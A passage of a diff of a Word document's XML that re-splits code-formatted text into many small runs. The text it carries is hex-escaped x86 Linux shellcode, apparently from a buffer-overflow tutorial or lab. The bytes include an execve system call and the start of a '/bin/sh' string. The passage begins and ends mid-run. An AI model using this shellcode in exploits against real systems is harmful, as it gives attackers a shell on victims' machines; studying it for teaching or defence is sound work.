+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>92\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xdf</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>2\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>54\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xf</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>7\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>16\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xf</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>7"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
         </w:rPr>
         <w:br/>
       </w:r>
@@ -2369,15 +3201,234 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="C7254E"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>56\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>04\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xf</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>7\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>56\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>08\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xf</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>7\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>56\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>83\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>4\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>74\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>56"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
         </w:rPr>
         <w:br/>
       </w:r>
@@ -2386,15 +3437,251 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="C7254E"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>73\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>08\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>56\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>53\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>54\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>59\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>0\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xcd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>80\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>31"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
         </w:rPr>
         <w:br/>
       </w:r>
@@ -2403,15 +3690,234 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="C7254E"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>0\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>40\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xeb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xf</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>9\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>8\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xbd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
